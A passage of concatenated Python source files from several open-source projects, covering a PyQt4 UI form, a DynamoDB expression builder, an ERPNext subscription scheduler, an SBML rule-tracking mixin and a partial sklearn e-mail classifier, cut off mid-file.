        for d in self.cg1.defines:
            x = self.cg1.coords[d][0][0], self.cg1.coords[d][1][0]
            y = self.cg1.coords[d][0][1], self.cg1.coords[d][1][1]
            z = self.cg1.coords[d][0][2], self.cg1.coords[d][1][2]
            mlab.plot3d(x, y, z, tube_radius=2, color=colors[d[0]])
        mlab.show()
        # Deliberate failure so the test cannot pass silently if unskipped.
        assert False
|
jithinbp/pslab-desktop-apps
|
psl_res/GUI/E_MISCELLANEOUS/B/templates/hackYourOwn.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'hackYourOwn.ui'
from PyQt4 import QtCore, QtGui
# Compatibility shims for the two PyQt4 string APIs.
# Under API v1, QString.fromUtf8 exists; under API v2 (and Python 3),
# QString is absent and plain str objects are used, so fall back to identity.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    def _fromUtf8(s):
        # API v2: strings are already unicode; pass through unchanged.
        return s

# Older PyQt4 versions accept an encoding argument for translate();
# newer ones dropped it, so pick the matching wrapper at import time.
try:
    _encoding = QtGui.QApplication.UnicodeUTF8

    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
    """Generated UI class (from hackYourOwn.ui via pyuic4).

    Do not edit by hand beyond comments: regenerate from the .ui file instead.
    Layout: a left frame with a Run button, and a right scroll area (SCF1)
    holding a grid (ExperimentLayout) that is populated at runtime.
    """

    def setupUi(self, MainWindow):
        """Build the widget tree and wire the Run button to MainWindow.run."""
        MainWindow.setObjectName(_fromUtf8("MainWindow"))
        MainWindow.resize(718, 475)
        MainWindow.setMinimumSize(QtCore.QSize(370, 0))
        MainWindow.setMaximumSize(QtCore.QSize(16777215, 16777215))
        # Central widget with a horizontal split: button frame | scroll area.
        self.SCF2 = QtGui.QWidget(MainWindow)
        self.SCF2.setStyleSheet(_fromUtf8(""))
        self.SCF2.setObjectName(_fromUtf8("SCF2"))
        self.horizontalLayout = QtGui.QHBoxLayout(self.SCF2)
        self.horizontalLayout.setMargin(0)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        # Left: frame containing only the Run push button.
        self.frame = QtGui.QFrame(self.SCF2)
        self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
        self.frame.setFrameShadow(QtGui.QFrame.Raised)
        self.frame.setObjectName(_fromUtf8("frame"))
        self.WidgetLayout = QtGui.QVBoxLayout(self.frame)
        self.WidgetLayout.setSpacing(0)
        self.WidgetLayout.setMargin(0)
        self.WidgetLayout.setObjectName(_fromUtf8("WidgetLayout"))
        self.pushButton = QtGui.QPushButton(self.frame)
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.WidgetLayout.addWidget(self.pushButton)
        self.horizontalLayout.addWidget(self.frame)
        # Right: resizable scroll area for dynamically added sensor widgets.
        self.scrollArea_4 = QtGui.QScrollArea(self.SCF2)
        sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.scrollArea_4.sizePolicy().hasHeightForWidth())
        self.scrollArea_4.setSizePolicy(sizePolicy)
        self.scrollArea_4.setMaximumSize(QtCore.QSize(16777215, 16777215))
        self.scrollArea_4.setStyleSheet(_fromUtf8(""))
        self.scrollArea_4.setWidgetResizable(True)
        self.scrollArea_4.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
        self.scrollArea_4.setObjectName(_fromUtf8("scrollArea_4"))
        self.SCF1 = QtGui.QWidget()
        self.SCF1.setGeometry(QtCore.QRect(0, 0, 532, 473))
        self.SCF1.setStyleSheet(_fromUtf8(""))
        self.SCF1.setObjectName(_fromUtf8("SCF1"))
        self.gridLayout_5 = QtGui.QGridLayout(self.SCF1)
        self.gridLayout_5.setMargin(0)
        self.gridLayout_5.setSpacing(0)
        self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
        self.frame_5 = QtGui.QFrame(self.SCF1)
        self.frame_5.setFrameShape(QtGui.QFrame.StyledPanel)
        self.frame_5.setFrameShadow(QtGui.QFrame.Raised)
        self.frame_5.setObjectName(_fromUtf8("frame_5"))
        self.gridLayout_7 = QtGui.QGridLayout(self.frame_5)
        self.gridLayout_7.setSpacing(5)
        self.gridLayout_7.setContentsMargins(0, 5, 0, 0)
        self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
        # ExperimentLayout is filled with sensor widgets by the application.
        self.ExperimentLayout = QtGui.QGridLayout()
        self.ExperimentLayout.setMargin(5)
        self.ExperimentLayout.setSpacing(7)
        self.ExperimentLayout.setObjectName(_fromUtf8("ExperimentLayout"))
        self.gridLayout_7.addLayout(self.ExperimentLayout, 1, 0, 1, 1)
        self.gridLayout_5.addWidget(self.frame_5, 0, 0, 1, 1)
        self.scrollArea_4.setWidget(self.SCF1)
        self.horizontalLayout.addWidget(self.scrollArea_4)
        # Give the scroll area three times the width of the button frame.
        self.horizontalLayout.setStretch(0, 1)
        self.horizontalLayout.setStretch(1, 3)
        MainWindow.setCentralWidget(self.SCF2)

        self.retranslateUi(MainWindow)
        # Old-style signal/slot connection: the button invokes MainWindow.run.
        QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.run)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        """Apply (re)translatable texts to all widgets."""
        MainWindow.setWindowTitle(_translate("MainWindow", "DIY programs", None))
        self.pushButton.setToolTip(_translate("MainWindow", "run the code", None))
        self.pushButton.setText(_translate("MainWindow", "Run", None))
        self.SCF1.setProperty("class", _translate("MainWindow", "PeripheralCollectionInner", None))
        self.frame_5.setToolTip(_translate("MainWindow", "Widgets specific to detected sensors will be displayed\n"
"here after you click the button below", None))
|
gusibi/dynamodb-py
|
dynamodb/expression.py
|
# -*- coding: utf-8 -*-
'''
DynamoDB KeyConditionExpression and FilterExpression
http://boto3.readthedocs.io/en/stable/reference/customizations/dynamodb.html#ref-dynamodb-conditions
'''
from __future__ import print_function
from decimal import Decimal
from boto3.dynamodb.conditions import Key, Attr
from .errors import ValidationException
from .helpers import smart_unicode
__all__ = ['Expression']
class Expression(object):
    """Mixin that builds DynamoDB update- and condition-expression fragments.

    Concrete field classes mixing this in are expected to provide:
    ``name`` (attribute name), ``field_type``, ``use_decimal_types``,
    ``hash_key`` and ``range_key``. Update builders (``set``, ``remove``,
    ``add``, ``list_append``) return ``(expression, attr_dict, action)``
    where ``attr_dict`` may hold ``'name'`` (ExpressionAttributeNames) and
    ``'value'`` (ExpressionAttributeValues) mappings; condition builders
    (``eq`` ... ``not_exists``) return ``(field, boto3_condition, use_key)``.
    """

    def set(self, value,
            set_path=None,
            attr_label=None,
            if_not_exists=None,
            list_append=None):
        '''
        Build a SET update fragment.

        parameters:
            - value: value
            - set_path: attr path if not use attr name
            - attr_label: string attr label ex: label=':p'
            - if_not_exists: string path ex: Price
            - list_append: (tuple) path, index
                ex: (#pr.FiveStar, -1) to last
                   (#pr.FiveStar, 0)  to first
        examples:
            Test(realname='gs', score=100).update(Test.order_score.set(100))
            Test(realname='gs', score=100).update(
                Test.order_score.set(5, label=':p')
            Test(realname='gs', score=100).update(
                Test.order_score.set(100, is_not_exists=('order_score', 50)))
            Test(realname='gs', score=100).update(
                Test.ids.set(100, list_append=('ids')))
            or
            Test(realname='gs', score=100).update(
                Test.ids.list_append(100))
        return exp, {label: value}
        '''
        path = attr_label or self.name
        label = ":{name}".format(name=path)
        attr_name = "#{name}".format(name=path)
        # ExpressionAttributeValues: DynamoDB rejects Python floats, so floats
        # (and fields flagged use_decimal_types) are stored as Decimal.
        if isinstance(value, float) or self.use_decimal_types:
            value = Decimal(str(value))
        eav = {label: value}
        ean = {}
        if if_not_exists:
            # SET #attr = if_not_exists(path, :label) -- only writes when the
            # attribute is still missing on the item.
            no_path, operand = if_not_exists, value
            if isinstance(operand, float):
                operand = Decimal(str(operand))
            eav[label] = operand
            ean[attr_name] = path
            exp = '{name} = if_not_exists({path}, {label})'.format(
                name=attr_name, path=no_path, label=label)
        elif list_append:
            # index 0 prepends, index -1 appends; anything else is rejected.
            list_path, index = list_append
            if index == 0:
                exp = "{path} = list_append({label}, {path})".format(
                    path=list_path, label=label)
            elif index == -1:
                exp = "{path} = list_append({path}, {label})".format(
                    path=list_path, label=label)
            else:
                raise ValidationException('index error')
        else:
            # Plain SET #attr = :label assignment.
            path = set_path or self.name
            attr_name = "#{name}".format(name=attr_label or path)
            ean[attr_name] = path
            exp = '{path} = {label}'.format(path=attr_name, label=label)
        exp_attr = {
            'name': ean,
            'value': eav
        }
        return exp, exp_attr, 'SET'

    def list_append(self, value, path=None, index=-1,
                    attr_label=None):
        """Build a SET fragment appending (index=-1) or prepending (index=0)
        *value* to a list attribute."""
        path = attr_label or path or self.name
        label = ":{name}".format(name=path)
        attr_name = "#{name}".format(name=path)
        if index == 0:
            exp = "{path} = list_append({label}, {path})".format(
                path=attr_name, label=label)
        elif index == -1:
            exp = "{path} = list_append({path}, {label})".format(
                path=attr_name, label=label)
        else:
            raise ValidationException('index error')
        exp_attr = {
            'value': {label: value},
            'name': {attr_name: path}
        }
        return exp, exp_attr, 'SET'

    def remove(self, path=None, indexes=None):
        '''
        Build a REMOVE fragment.

        parameters:
            path: attr path
            indexes: (list) element indexes for list fields, ex: [2, 4]
        '''
        exp = ''
        path = path or self.name
        attr_name = "#{name}".format(name=path)
        ean = {attr_name: path}
        if self.field_type == 'list':
            # REMOVE #attr[i], #attr[j], ... -- delete individual elements.
            for index in indexes:
                sub_exp = '{name}[{index}]'.format(name=attr_name,
                                                   index=index)
                if not exp:
                    exp = '{sub_exp}'.format(sub_exp=sub_exp)
                else:
                    exp = '{exp}, {sub_exp}'.format(exp=exp,
                                                    sub_exp=sub_exp)
            return exp, {'name': ean}, 'REMOVE'
        else:
            # Whole-attribute removal uses the raw path, so no
            # ExpressionAttributeNames mapping is needed (hence the empty dict).
            exp = '{path}'.format(path=path)
            return exp, {}, 'REMOVE'

    def add(self, value, path=None, attr_label=None):
        '''
        Build an ADD fragment; supported for numbers and sets only.

        ADD Price :n     -> price += n
        ADD Color :c     -> add :c to the Color set
        '''
        if self.field_type not in ('integer', 'float', 'set', 'dict'):
            raise ValidationException('Incorrect data type, only [integer, float, set, dict]')
        exp_attr = {}
        if not path:
            attr_name = "#{name}".format(name=attr_label or self.name)
            exp_attr['name'] = {attr_name: self.name}
        else:
            # An explicit path is used verbatim; no name placeholder mapping.
            attr_name = attr_label or path
        label = ":{name}".format(name=self.name)
        exp = '{name} {label}'.format(name=attr_name, label=label)
        exp_attr['value'] = {label: value}
        return exp, exp_attr, 'ADD'

    def typecast_for_storage(self, value):
        """Convert *value* to the unicode form stored in DynamoDB."""
        return smart_unicode(value)

    def _expression_func(self, op, *values, **kwargs):
        """Build a boto3 Key/Attr condition for operator *op*.

        Key() is used for hash/range keys (or when use_key=True), Attr()
        otherwise. Hash keys only support equality.
        """
        # Materialize the map() result: on Python 3 a bare map object is a
        # one-shot iterator, so func(*values) below would otherwise leave an
        # exhausted iterator stored in self.express_args.
        values = list(map(self.typecast_for_storage, values))
        # for use by index ... bad
        self.op = op
        self.express_args = values
        use_key = kwargs.get('use_key', False)
        if self.hash_key and op != 'eq':
            raise ValidationException('Query key condition not supported')
        elif self.hash_key or self.range_key or use_key:
            use_key = True
            func = getattr(Key(self.name), op, None)
        else:
            func = getattr(Attr(self.name), op, None)
        if not func:
            raise ValidationException('Query key condition not supported')
        return self, func(*values), use_key

    def _expression(self, op, value):
        """Render a raw '{name} {op} :{name}' fragment (legacy helper)."""
        if self.use_decimal_types:
            value = Decimal(str(value))
        label = ':%s' % self.name
        exp = '{name} {op} {value}'.format(name=self.name, op=op, value=label)
        return exp, label, value

    def eq(self, value):  # ==
        # Creates a condition where the attribute is equal to the value.
        # Attr & Key
        return self._expression_func('eq', value)

    def ne(self, value):  # !=
        # Creates a condition where the attribute is not equal to the value
        # Attr
        return self._expression_func('ne', value)

    def lt(self, value):  # <
        # Creates a condition where the attribute is less than the value.
        # Attr & Key
        return self._expression_func('lt', value)

    def lte(self, value):  # <=
        # Creates a condition where the attribute is less than or
        # equal to the value.
        # Attr & Key
        return self._expression_func('lte', value)

    def gt(self, value):  # >
        # Creates a condition where the attribute is greater than the value.
        # Attr & Key
        return self._expression_func('gt', value)

    def gte(self, value):  # >=
        # Creates a condition where the attribute is greater than or equal to
        # the value.
        # Attr & Key
        return self._expression_func('gte', value)

    def between(self, low_value, high_value):
        # Creates a condition where the attribute is greater than or equal to
        # the low value and less than or equal to the high value.
        # Attr & Key
        return self._expression_func('between', low_value, high_value)

    def begins_with(self, value):
        # Creates a condition where the attribute begins with the value
        # Attr & Key
        return self._expression_func('begins_with', value)

    def is_in(self, value):
        # Creates a condition where the attribute is in the value
        # Attr
        if self.hash_key or self.range_key:
            # ValidationException
            raise ValidationException('Query key condition not supported')
        return self.name, Attr(self.name).is_in(value), False

    def contains(self, value):
        # Creates a condition where the attribute contains the value.
        # Attr
        if self.hash_key or self.range_key:
            # ValidationException
            raise ValidationException('Query key condition not supported')
        return self.name, Attr(self.name).contains(value), False

    def exists(self):
        # Creates a condition where the attribute exists.
        # Attr
        if self.hash_key or self.range_key:
            # ValidationException
            raise ValidationException('Query key condition not supported')
        return self.name, Attr(self.name).exists(), False

    def not_exists(self):
        # Creates a condition where the attribute does not exists.
        # Attr
        if self.hash_key or self.range_key:
            # ValidationException
            raise ValidationException('Query key condition not supported')
        return self.name, Attr(self.name).not_exists(), False
|
mbauskar/erpnext
|
erpnext/subscription/doctype/subscription/subscription.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
import calendar
from frappe import _
from frappe.desk.form import assign_to
from dateutil.relativedelta import relativedelta
from frappe.utils.user import get_system_managers
from frappe.utils import cstr, getdate, split_emails, add_days, today
from frappe.model.document import Document
# Number of months between two scheduled runs for each month-based frequency;
# 'Weekly'/'Daily' are not listed here and are handled as day offsets below.
month_map = {'Monthly': 1, 'Quarterly': 3, 'Half-yearly': 6, 'Yearly': 12}
class Subscription(Document):
	"""Controller for recurring subscriptions: validates schedule settings,
	computes the next run date and links back to the reference document."""

	def validate(self):
		self.update_status()
		self.validate_dates()
		self.validate_next_schedule_date()
		self.validate_email_id()

	def before_submit(self):
		self.set_next_schedule_date()

	def on_submit(self):
		self.update_subscription_id()

	def on_update_after_submit(self):
		self.validate_dates()
		self.set_next_schedule_date()

	def validate_dates(self):
		# An empty end date means the subscription runs indefinitely.
		if not self.end_date:
			return
		if getdate(self.start_date) > getdate(self.end_date):
			frappe.throw(_("End date must be greater than start date"))

	def validate_next_schedule_date(self):
		if not (self.repeat_on_day and self.next_schedule_date):
			return
		next_date = getdate(self.next_schedule_date)
		if next_date.day == self.repeat_on_day:
			return
		# if the repeat day is the last day of the month (31)
		# and the current month does not have as many days,
		# then the last day of the current month is a valid date
		month_last_day = calendar.monthrange(next_date.year, next_date.month)[1]
		if self.repeat_on_day < month_last_day:
			# the specified day of the month is not same as the day specified
			# or the last day of the month
			frappe.throw(_("Next Date's day and Repeat on Day of Month must be equal"))

	def validate_email_id(self):
		if not self.notify_by_email:
			return
		if self.recipients:
			from frappe.utils import validate_email_add
			recipient_list = split_emails(self.recipients.replace("\n", ""))
			for address in recipient_list:
				if not validate_email_add(address):
					frappe.throw(_("{0} is an invalid email address in 'Recipients'").format(address))
		else:
			frappe.throw(_("'Recipients' not specified"))

	def set_next_schedule_date(self):
		self.next_schedule_date = get_next_schedule_date(
			self.start_date, self.frequency, self.repeat_on_day)

	def update_subscription_id(self):
		# The reference doctype must expose a 'subscription' custom field.
		target = frappe.get_doc(self.reference_doctype, self.reference_document)
		if not target.meta.get_field('subscription'):
			frappe.throw(_("Add custom field Subscription Id in the doctype {0}").format(self.reference_doctype))
		target.db_set('subscription', self.name)

	def update_status(self):
		docstatus_to_status = {
			'0': 'Draft',
			'1': 'Submitted',
			'2': 'Cancelled'
		}
		self.status = docstatus_to_status[cstr(self.docstatus or 0)]
def get_next_schedule_date(start_date, frequency, repeat_on_day):
    """Return the next run date after *start_date* for the given frequency.

    Month-based frequencies use month_map + get_next_date; 'Weekly' adds
    seven days and any other frequency adds one day.
    """
    months = month_map.get(frequency)
    if months:
        return get_next_date(start_date, months, repeat_on_day)
    return add_days(start_date, 7 if frequency == 'Weekly' else 1)
def make_subscription_entry(date=None):
    """Create documents for every subscription due on or before *date*.

    Catches up missed runs by looping until the schedule passes today,
    then persists the final next_schedule_date.
    """
    date = date or today()
    for entry in get_subscription_entries(date):
        schedule_date = getdate(entry.next_schedule_date)
        while schedule_date <= getdate(today()):
            create_documents(entry, schedule_date)
            schedule_date = get_next_schedule_date(
                schedule_date, entry.frequency, entry.repeat_on_day)
        if schedule_date:
            frappe.db.set_value('Subscription', entry.name, 'next_schedule_date', schedule_date)
def get_subscription_entries(date):
    """Fetch all submitted, enabled subscriptions due on or before *date*."""
    query = """ select * from `tabSubscription`
		where docstatus = 1 and next_schedule_date <=%s
		and reference_document is not null and reference_document != ''
		and next_schedule_date <= ifnull(end_date, '2199-12-31')
		and ifnull(disabled, 0) = 0"""
    return frappe.db.sql(query, (date), as_dict=1)
def create_documents(data, schedule_date):
    """Create one recurring document for subscription *data* on *schedule_date*.

    Commits on success.  On any failure the transaction is rolled back, the
    traceback is logged in a fresh transaction, and (outside of tests) the
    subscription owner is notified.
    """
    try:
        doc = make_new_document(data, schedule_date)
        if data.notify_by_email:
            send_notification(doc, data.print_format, data.recipients)
        frappe.db.commit()
    except Exception:
        frappe.db.rollback()
        # Start a new transaction so the error log itself can be committed.
        frappe.db.begin()
        frappe.log_error(frappe.get_traceback())
        frappe.db.commit()
        if data.reference_document and not frappe.flags.in_test:
            notify_error_to_user(data)
def notify_error_to_user(data):
    """Look up the party tied to the failed document and alert the owner."""
    selling = ['Sales Order', 'Sales Invoice', 'Delivery Note']
    buying = ['Purchase Order', 'Purchase Invoice', 'Purchase Receipt']
    if data.reference_doctype in selling:
        party_type = 'customer'
    elif data.reference_doctype in buying:
        party_type = 'supplier'
    else:
        party_type = ''
    party = ''
    if party_type:
        party = frappe.db.get_value(data.reference_doctype, data.reference_document, party_type)
    notify_errors(data.reference_document, data.reference_doctype, party, data.owner)
def make_new_document(args, schedule_date):
    """Clone the reference document, adapt it for *schedule_date*, insert it.

    Submits the copy as well when the subscription requests it.
    """
    source = frappe.get_doc(args.reference_doctype, args.reference_document)
    copy = frappe.copy_doc(source, ignore_no_copy=False)
    update_doc(copy, source, args, schedule_date)
    copy.insert(ignore_permissions=True)
    if args.submit_on_creation:
        copy.submit()
    return copy
def update_doc(new_document, reference_doc, args, schedule_date):
    """Prepare the copied document: reset draft state, tag the subscription,
    run the doctype's on_recurring hook and stamp required date fields."""
    new_document.docstatus = 0
    if new_document.meta.get_field('set_posting_time'):
        new_document.set('set_posting_time', 1)
    if new_document.meta.get_field('subscription'):
        new_document.set('subscription', args.name)
    new_document.run_method("on_recurring", reference_doc=reference_doc, subscription_doc=args)
    # Every mandatory Date field is moved to the new schedule date.
    for field in new_document.meta.fields:
        if field.fieldtype == 'Date' and field.reqd:
            new_document.set(field.fieldname, schedule_date)
def get_next_date(dt, mcount, day=None):
    """Add *mcount* months to *dt*, optionally pinning the day of month."""
    return getdate(dt) + relativedelta(months=mcount, day=day)
def send_notification(new_rv, print_format='Standard', recipients=None):
    """Notify concerned persons about recurring document generation"""
    recipients = recipients or new_rv.notification_email_address
    print_format = print_format or new_rv.recurring_print_format
    subject = _("New {0}: #{1}").format(new_rv.doctype, new_rv.name)
    message = _("Please find attached {0} #{1}").format(new_rv.doctype, new_rv.name)
    attachment = frappe.attach_print(
        new_rv.doctype, new_rv.name, file_name=new_rv.name, print_format=print_format)
    frappe.sendmail(recipients, subject=subject, message=message, attachments=[attachment])
def notify_errors(doc, doctype, party, owner):
    """E-mail system managers and the owner about a failed recurring doc,
    then create a follow-up assignment for the managers."""
    recipients = get_system_managers(only_name=True)
    owner_email = frappe.db.get_value("User", owner, "email")
    body = frappe.get_template("templates/emails/recurring_document_failed.html").render({
        "type": doctype,
        "name": doc,
        "party": party or ""
    })
    frappe.sendmail(
        recipients + [owner_email],
        subject="[Urgent] Error while creating recurring %s for %s" % (doctype, doc),
        message=body)
    assign_task_to_owner(doc, doctype, "Recurring Invoice Failed", recipients)
def assign_task_to_owner(doc, doctype, msg, users):
    """Create a high-priority assignment on *doc* for each user in *users*."""
    for user in users:
        assign_to.add({
            'assign_to': user,
            'doctype': doctype,
            'name': doc,
            'description': msg,
            'priority': 'High',
        })
@frappe.whitelist()
def make_subscription(doctype, docname):
    """Return a new (unsaved) Subscription pointing at the given document."""
    subscription = frappe.new_doc('Subscription')
    subscription.reference_doctype = doctype
    subscription.reference_document = docname
    return subscription
|
vincent-noel/libSigNetSim
|
libsignetsim/model/sbml/RuledVariable.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2017 Vincent Noel (vincent.noel@butantan.gov.br)
#
# This file is part of libSigNetSim.
#
# libSigNetSim is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# libSigNetSim is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with libSigNetSim. If not, see <http://www.gnu.org/licenses/>.
"""
This file ...
"""
class RuledVariable(object):
    """
    Mixin tracking whether a model variable (compartment, species,
    parameter, ...) is governed by a rule, and by which rule.
    """

    def __init__(self, model):
        # Parent model; used to resolve the rule object from its id.
        self.__model = model
        self.__isRuled = False
        # Index (rule.objId + shift) into model.listOfRules, or None.
        self.__isRuledBy = None

    def setRuledBy(self, rule, shift=0):
        """Mark this variable as governed by *rule* (objId offset by *shift*)."""
        self.__isRuled = True
        self.__isRuledBy = rule.objId + shift

    def unsetRuledBy(self):
        """Clear the rule association.

        Bug fix: this previously assigned to ``self.__isRuledById`` (a
        typo), which left the stale rule index in ``__isRuledBy``.
        """
        self.__isRuled = False
        self.__isRuledBy = None

    def isRuled(self):
        """Return True when a rule governs this variable."""
        return self.__isRuled

    def isRuledBy(self):
        """Return the governing rule object, or None when not ruled."""
        if self.isRuled():
            return self.__model.listOfRules[self.__isRuledBy]
        else:
            return None

    def isRateRuled(self):
        """ Tests if the variable is computed with a rate rule """
        return self.isRuled() and self.__model.listOfRules[self.__isRuledBy].isRate()

    def isAssignmentRuled(self):
        """ Tests if the variable is computed with an assignment rule """
        return self.isRuled() and self.__model.listOfRules[self.__isRuledBy].isAssignment()
|
discipl/NAML
|
app/ml_model_v1.py
|
#standard packages
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
matplotlib.use('Agg')
import sqlite3
import pickle
import re
from flask import json
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB, BernoulliNB
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.model_selection import ShuffleSplit, RandomizedSearchCV
from sklearn.base import BaseEstimator
from scipy.stats import randint, expon, norm
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score, precision_score
from sklearn.metrics import make_scorer
from nltk.corpus import stopwords
from nltk.stem.snowball import DutchStemmer
from functools import partial,reduce
import os
# Base directory of the deployed app (container path).
localdir = '/app'
# SQLite database holding the labelled e-mails.
path_database = localdir + '/static/data/databases/'
filename_database = 'database_NA_v1.db'
# Persisted per-model decision thresholds (numpy .npy dict).
path_thresholds =localdir + '/static/Images/'
filename_thresholds = 'thresholds.npy'
# Output directories for generated model/report images.
path_confusion_matrix = localdir + '/static/Images/confusion_matrices_NA/'
path_wordcloud = localdir + '/static/Images/wordcloud_NA/'
path_pies = localdir + '/static/Images/pies_NA/'
path_rocs = localdir + '/static/Images/rocs_NA/'
path_models = localdir + '/static/Images/models_NA/'
# Per-email visualisations (feature importance, probability pie).
path_emails_feature_importance = localdir + '/static/Images/Emails/feature_importance_email_NA/'
path_emails_pie_prob = localdir + '/static/Images/Emails/pie_probability_NA/'
# Index files describing the generated images / per-user e-mail data.
path_info_images = localdir + '/static/Images/'
filename_info_images = 'filenames_imagesNA.npy'
path_json_info_email_images = localdir + '/static/Images/Emails/'
filename_json_info_email_images = 'json_email_data_NA.txt'
path_user_email_images = localdir + '/static/Images/Emails/Users/'
def tokenize(text, stop, stemmer):
    """Convert raw text into cleaned lowercase tokens.

    Splits on whitespace, lowercases, drops stopwords, strips everything
    but ASCII letters, and keeps only tokens longer than two characters.
    *stemmer* is currently unused (stemming is disabled).
    """
    lowered = (word.lower() for word in text.split())
    unstopped = (word for word in lowered if word not in stop)
    letters_only = ("".join(re.findall("[a-zA-Z]+", word)) for word in unstopped)
    return [token for token in letters_only if len(token) > 2]
# Candidate classifiers keyed by short name: 'mnb' = multinomial naive Bayes
# with uniform priors, 'rf'/'etr' = 50-estimator forest variants.
model_dict = {'mnb': MultinomialNB(fit_prior=False), 'rf': RandomForestClassifier(n_estimators=50),
              'etr': ExtraTreesClassifier(n_estimators=50)}
def load_filenames_images():
    """Load the saved dict of generated image filenames from disk."""
    return np.load(path_info_images + filename_info_images).item()
def get_threshold_dic():
    """Return the persisted per-model decision thresholds as a dict."""
    thresholds_file = path_thresholds + filename_thresholds
    return np.load(thresholds_file).item()
def set_threshold_dic(name_model, new_thres):
    """Persist a new decision threshold for *name_model*.

    Re-reads the stored dict, deletes the old file, and writes the
    updated dict back to the same location.
    """
    thresholds_file = path_thresholds + filename_thresholds
    thresholds = np.load(thresholds_file).item()
    print('delete old thresholds...')
    os.remove(thresholds_file)
    thresholds[name_model] = new_thres
    np.save(thresholds_file, thresholds)
# Module-level cache of the persisted thresholds, loaded once at import time.
threshold_dic = get_threshold_dic()
def get_estimator(model_name='mnb'):
    """Build a TF-IDF + classifier pipeline for Dutch e-mail text.

    Arguments:
        model_name -- key into ``model_dict`` ('mnb', 'rf' or 'etr').

    Returns an sklearn ``Pipeline`` with a 'vectorizer' and a
    'classifier' step.

    Bug fix: the local was previously named ``stopwords``, shadowing the
    imported nltk ``stopwords`` module and raising UnboundLocalError on
    every call.
    """
    dutch_stopwords = set(stopwords.words('dutch'))
    dutch_stemmer = DutchStemmer()
    model = model_dict[model_name]
    estimator = Pipeline(steps=[
        ('vectorizer', TfidfVectorizer(input=u'content', encoding=u'latin1', decode_error=u'strict', strip_accents=None,
                                       lowercase=True,
                                       preprocessor=None,
                                       tokenizer=partial(tokenize, stop=dutch_stopwords, stemmer=dutch_stemmer),
                                       analyzer=u'word',  # stop_words=(stopwords.words('dutch')),
                                       ngram_range=(1, 3),  # max_df=0.9, min_df=0.005,
                                       max_features=10000, vocabulary=None, binary=False,
                                       norm=u'l1', use_idf=True, smooth_idf=True, sublinear_tf=False)),
        ('classifier', model)
    ])
    return estimator
def get_train_test(path_database, filename_database, test_size=0.3):
    """Read all labelled mails from the database and split train/test.

    Returns (X_train, X_test, y_train, y_test) with bodies as strings
    and targets as ints; the split uses random_state=0 for repeatability.
    """
    connection = sqlite3.connect(path_database + filename_database)
    cursor = connection.cursor()
    cursor.execute('SELECT mail_id,body,truth_class FROM TABLE_MAILS ')
    frames = []
    for position, row in enumerate(cursor):
        frames.append(pd.DataFrame({'Id': row[0], 'body': row[1], 'Target': row[2]}, index=[position]))
    connection.close()
    df = pd.concat(frames) if frames else pd.DataFrame()
    # Drop rows missing either the body or the label.
    df = df.loc[(df['body'].notnull()) & (df['Target'].notnull()), :]
    X = df['body'].astype(str).values
    y = df['Target'].astype(int).values
    return train_test_split(X, y, test_size=test_size, random_state=0)
#
# def get_mail_test(mail_id):
# X,y,df = get_mail(path_database,filename_database,mail_id)
# return df
def get_mail(path_database, filename_database, mail_id):
    """Load a single e-mail record by its mail_id.

    Returns (bodies, label, frame): a one-element array of body strings,
    the truth class as a string, and the one-row DataFrame itself.
    """
    connection = sqlite3.connect(path_database + filename_database)
    cursor = connection.cursor()
    cursor.execute('SELECT mail_id,body,truth_class,date_sent,from_email_address,subject FROM TABLE_MAILS where mail_id=?', [mail_id])
    row = cursor.fetchone()
    frame = pd.DataFrame()
    if row is not None:
        frame = pd.DataFrame({'Id': row[0], 'body': row[1], 'Target': row[2],
                              'Date': row[3], 'From': row[4], 'Subject': row[5]}, index=[0])
    connection.close()
    bodies = frame['body'].astype(str).values
    label = frame['Target'].astype(str).values[0]
    return bodies, label, frame
def get_n_mails_of(path_database, filename_database, nmails=10, address=''):
    """Return a DataFrame with at most *nmails* rows from TABLE_MAILS.

    NOTE: the *address* parameter is accepted but currently not used to
    filter the query.
    """
    connection = sqlite3.connect(path_database + filename_database)
    cursor = connection.cursor()
    cursor.execute('SELECT mail_id,body,truth_class,date_sent,from_email_address,subject FROM TABLE_MAILS ')
    records = []
    for row in cursor:
        records.append({'Id': row[0], 'body': row[1], 'Target': row[2],
                        'Date': row[3], 'From': row[4], 'Subject': row[5]})
        if len(records) >= nmails:
            break
    connection.close()
    frame = pd.DataFrame()
    for position, record in enumerate(records):
        frame = pd.concat([frame, pd.DataFrame(record, index=[position])])
    print(frame.columns)
    return frame
def fit_model(X, y, estimator, weights=(0.49, 0.5)):
